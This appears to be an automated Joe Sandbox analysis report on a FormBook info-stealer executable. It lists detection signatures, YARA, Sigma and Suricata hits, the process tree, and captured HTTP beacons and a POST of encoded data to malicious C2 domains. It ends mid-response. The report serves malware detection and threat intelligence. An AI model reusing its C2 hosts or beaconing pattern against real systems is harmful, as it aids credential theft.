Edit tour

Windows Analysis Report
smQoKNkwB7.exe

Overview

General Information

Sample name:	smQoKNkwB7.exe renamed because original name is a hash value
Original sample name:	7d63d03d52fd10653117f9572caa8e1d701b1e781354e1ea301df00a9d593bc4.exe
Analysis ID:	1587790
MD5:	5fc85a215cae58fe521c9f12f5169a99
SHA1:	b8fec2bb17698e5a04a11e9f325e4eaf761a084d
SHA256:	7d63d03d52fd10653117f9572caa8e1d701b1e781354e1ea301df00a9d593bc4
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

smQoKNkwB7.exe (PID: 1456 cmdline: "C:\Users\user\Desktop\smQoKNkwB7.exe" MD5: 5FC85A215CAE58FE521C9F12F5169A99)

svchost.exe (PID: 3424 cmdline: "C:\Users\user\Desktop\smQoKNkwB7.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

wjIagcdbKdk.exe (PID: 1816 cmdline: "C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

mtstocom.exe (PID: 1444 cmdline: "C:\Windows\SysWOW64\mtstocom.exe" MD5: 5930C59472F42B5F237500C999727441)

firefox.exe (PID: 3320 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.3567988233.00000000032D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2889384999.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3568159878.0000000003590000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3569278704.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3580689111.00000000095B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2890849255.0000000006400000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3569480594.00000000057A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2890116431.00000000033F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\smQoKNkwB7.exe", CommandLine: "C:\Users\user\Desktop\smQoKNkwB7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\smQoKNkwB7.exe", ParentImage: C:\Users\user\Desktop\smQoKNkwB7.exe, ParentProcessId: 1456, ParentProcessName: smQoKNkwB7.exe, ProcessCommandLine: "C:\Users\user\Desktop\smQoKNkwB7.exe", ProcessId: 3424, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\smQoKNkwB7.exe", CommandLine: "C:\Users\user\Desktop\smQoKNkwB7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\smQoKNkwB7.exe", ParentImage: C:\Users\user\Desktop\smQoKNkwB7.exe, ParentProcessId: 1456, ParentProcessName: smQoKNkwB7.exe, ProcessCommandLine: "C:\Users\user\Desktop\smQoKNkwB7.exe", ProcessId: 3424, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:02:42.148028+0100	2018141	1	A Network Trojan was detected	18.143.155.63	80	192.168.2.6	49732	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.cloijz.info/r4db/	Avira URL Cloud: Label: phishing
Source: http://www.cloijz.info/r4db/?jT=FQ/RR5Jd24eUARJyGPuMKqZXezSzu6XwjK+Oq7ZF4qPw6Wtsm8nU8fJ2hbzCFTyWuYbuF1JB0V7UBnva6FDpDFZu5ThYyaNjoqhPdko0IWZZd4mabolfnI5igKK/UEridKP27nc=&JDE4I=Cr640F7p	Avira URL Cloud: Label: phishing
Source: http://www.xinchaocjcela.net/uw0r/	Avira URL Cloud: Label: malware
Source: http://www.xinchaocjcela.net/uw0r/?jT=nPEICG3NmX6YdDAbYweJ2KwuWMLPhUb+/mQ5fssM2K6c4DyCydhY6SRwuUq/IGDqoRtq++LuhfQJ86PpNRqRIe6Bu//QfNw4XL/wkkPE7ytB3vyYAJMpbOGuBxSCYjIrp4GMsFs=&JDE4I=Cr640F7p	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: smQoKNkwB7.exe	Virustotal: Detection: 61%			Perma Link
Source: smQoKNkwB7.exe	ReversingLabs: Detection: 73%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3567988233.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2889384999.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3568159878.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3569278704.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3580689111.00000000095B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2890849255.0000000006400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3569480594.00000000057A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2890116431.00000000033F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: smQoKNkwB7.exe

Joe Sandbox ML: detected

Source: smQoKNkwB7.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: mtstocom.pdb source: svchost.exe, 00000002.00000003.2848443938.0000000002E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2848113543.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, wjIagcdbKdk.exe, 00000007.00000003.2958456910.000000000122F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wjIagcdbKdk.exe, 00000007.00000000.2800546712.000000000065E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: smQoKNkwB7.exe, 00000000.00000003.2344014165.0000000003560000.00000004.00001000.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000003.2343268774.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2890160595.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2783936590.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2785513325.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2890160595.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3569614452.0000000005260000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000003.2889610490.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000003.2891695593.00000000050AB000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3569614452.00000000053FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: smQoKNkwB7.exe, 00000000.00000003.2344014165.0000000003560000.00000004.00001000.00020000.00000000.sdmp, smQoKNkwB7.exe, 00000000.00000003.2343268774.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2890160595.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2783936590.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2785513325.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2890160595.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, mtstocom.exe, 00000008.00000002.3569614452.0000000005260000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000003.2889610490.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000003.2891695593.00000000050AB000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3569614452.00000000053FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mtstocom.pdbGCTL source: svchost.exe, 00000002.00000003.2848443938.0000000002E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2848113543.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, wjIagcdbKdk.exe, 00000007.00000003.2958456910.000000000122F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: wjIagcdbKdk.exe, 00000007.00000002.3578843174.000000000717C000.00000004.80000000.00040000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3568272016.0000000003666000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3570258278.000000000588C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3169815403.000000001840C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: wjIagcdbKdk.exe, 00000007.00000002.3578843174.000000000717C000.00000004.80000000.00040000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3568272016.0000000003666000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000008.00000002.3570258278.000000000588C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3169815403.000000001840C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0024DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0024DBBE
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0021C2A2 FindFirstFileExW,	0_2_0021C2A2
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_002568EE FindFirstFileW,FindClose,	0_2_002568EE
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0025698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0025698F
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0024D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0024D076
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0024D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0024D3A9
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00259642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00259642
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0025979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0025979D
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00259B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00259B2B
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00255C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00255C97
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032EC4D0 FindFirstFileW,FindNextFileW,FindClose,	8_2_032EC4D0

Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 4x nop then mov esp, ebp	7_2_095EB0BA
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 4x nop then pop edi	7_2_095EC456
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 4x nop then pop edi	7_2_095EC47D
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 4x nop then xor eax, eax	7_2_095F0F8D
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 4x nop then xor eax, eax	8_2_032D9E30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 4x nop then mov ebx, 00000004h	8_2_050F04DF

Source: Joe Sandbox View	IP Address: 47.83.1.90 47.83.1.90
Source: Joe Sandbox View	IP Address: 18.143.155.63 18.143.155.63

Source: Network traffic

Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.143.155.63:80 -> 192.168.2.6:49732

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0025CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0025CE44

Source: global traffic	HTTP traffic detected: GET /30sl/?JDE4I=Cr640F7p&jT=Y8m72M9itisBKHCuJygfmdA87gCGNftSw12cMpbnF1u6Xw97jV7YOpeEW7zuXiNJMD7NgZYDN5Q2P1YDh66t6OiemU0Jj6NmSlmlnFqeO8K+H2svpJMc7ylVJl401FrjRLqc2Lo= HTTP/1.1Host: www.wuyyv4tq.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Source: global traffic	HTTP traffic detected: GET /r4db/?jT=FQ/RR5Jd24eUARJyGPuMKqZXezSzu6XwjK+Oq7ZF4qPw6Wtsm8nU8fJ2hbzCFTyWuYbuF1JB0V7UBnva6FDpDFZu5ThYyaNjoqhPdko0IWZZd4mabolfnI5igKK/UEridKP27nc=&JDE4I=Cr640F7p HTTP/1.1Host: www.cloijz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Source: global traffic	HTTP traffic detected: GET /uw0r/?jT=nPEICG3NmX6YdDAbYweJ2KwuWMLPhUb+/mQ5fssM2K6c4DyCydhY6SRwuUq/IGDqoRtq++LuhfQJ86PpNRqRIe6Bu//QfNw4XL/wkkPE7ytB3vyYAJMpbOGuBxSCYjIrp4GMsFs=&JDE4I=Cr640F7p HTTP/1.1Host: www.xinchaocjcela.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Source: global traffic	HTTP traffic detected: GET /ej4l/?jT=TviM9A7gHy1aV0uzN+xbmzzcXhhU0op9aqme4YAfufO2xJ6qsqEsFloERXhIecS+xM6WSeF6JnXzi9yaG/Cy6FB65DdAh+xVUrF/YXRKiZhV1QAbsSFCcmJpeQFsCmEmOOsC+Ls=&JDE4I=Cr640F7p HTTP/1.1Host: www.grimbo.boatsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0

Source: global traffic	DNS traffic detected: DNS query: www.wuyyv4tq.top
Source: global traffic	DNS traffic detected: DNS query: www.cloijz.info
Source: global traffic	DNS traffic detected: DNS query: www.xinchaocjcela.net
Source: global traffic	DNS traffic detected: DNS query: www.grimbo.boats

Source: unknown

HTTP traffic detected: POST /r4db/ HTTP/1.1Host: www.cloijz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 207Origin: http://www.cloijz.infoReferer: http://www.cloijz.info/r4db/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0Data Raw: 6a 54 3d 49 53 58 78 53 50 74 31 7a 75 4f 56 50 67 6c 47 64 4e 57 46 51 63 52 32 48 51 61 76 72 66 61 78 2f 4b 69 7a 76 62 45 6b 74 71 47 55 32 6b 56 49 78 62 36 72 67 37 35 55 67 4e 36 6f 56 6a 6d 66 70 70 47 47 4b 31 64 49 35 45 44 6b 4c 44 33 59 71 6b 33 73 4e 77 42 33 2f 69 39 34 6e 50 56 64 77 76 42 54 58 69 39 48 4e 41 39 6f 5a 2b 36 4c 59 37 30 6c 6f 37 31 7a 71 73 4f 2f 59 33 69 75 62 4d 72 55 32 48 34 6e 2b 74 4e 54 41 46 63 47 52 66 66 39 4e 79 50 64 62 34 2f 68 78 43 64 32 65 7a 4b 59 55 31 2f 53 2b 48 55 2f 46 57 49 54 73 58 71 56 44 6f 41 51 65 39 32 4c 6e 7a 43 6d 50 6b 79 73 79 78 5a 4e 2f 2f 7a 71 Data Ascii: jT=ISXxSPt1zuOVPglGdNWFQcR2HQavrfax/KizvbEktqGU2kVIxb6rg75UgN6oVjmfppGGK1dI5EDkLD3Yqk3sNwB3/i94nPVdwvBTXi9HNA9oZ+6LY70lo71zqsO/Y3iubMrU2H4n+tNTAFcGRff9NyPdb4/hxCd2ezKYU1/S+HU/FWITsXqVDoAQe92LnzCmPkysyxZN//zq

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 17:02:03 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:02:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n49S4vjDGsfSmzHYJYEQfNAC2oifcEC4Fdku39PTUMGsRt%2Btc2xQ9WO6VnsraxB4daZdaIzCet6225vma7QwqeEarvCmNNOoYahbbSAJ4HgQN1s1J8qQ5RXMcO5ovMOBcZW2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe3c9b6a0142b1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1631&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=650&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:02:50 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6rsL01UE9oqI7BMAmkpoq6ojuxvnfPwMWxi7YBGq%2FNf4cE763Z5URyw4Tl90vJx24Y2dYirbC%2FdXJHeMqsZK2xWZGYuZu%2FnjG1fjlI5DLmQcpnOuQ%2Bxw6x%2B5PcAfeDpQLF5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe3cab5c29443e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1712&rtt_var=856&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=674&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:02:52 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=udEuAWlBhcMQUPrgahSsooG6tLMvR%2B3qUnOYhA3DbtnESD%2FU7D8md%2FWDazZ4PjvFbKyZRofp%2F%2FoRzP0uKAXYQsNPJojWWWd5JWIt1H8hhJ2i5dmXTFmrU2u%2F9J9YRXPZht2E"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe3cbb4d91426a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: 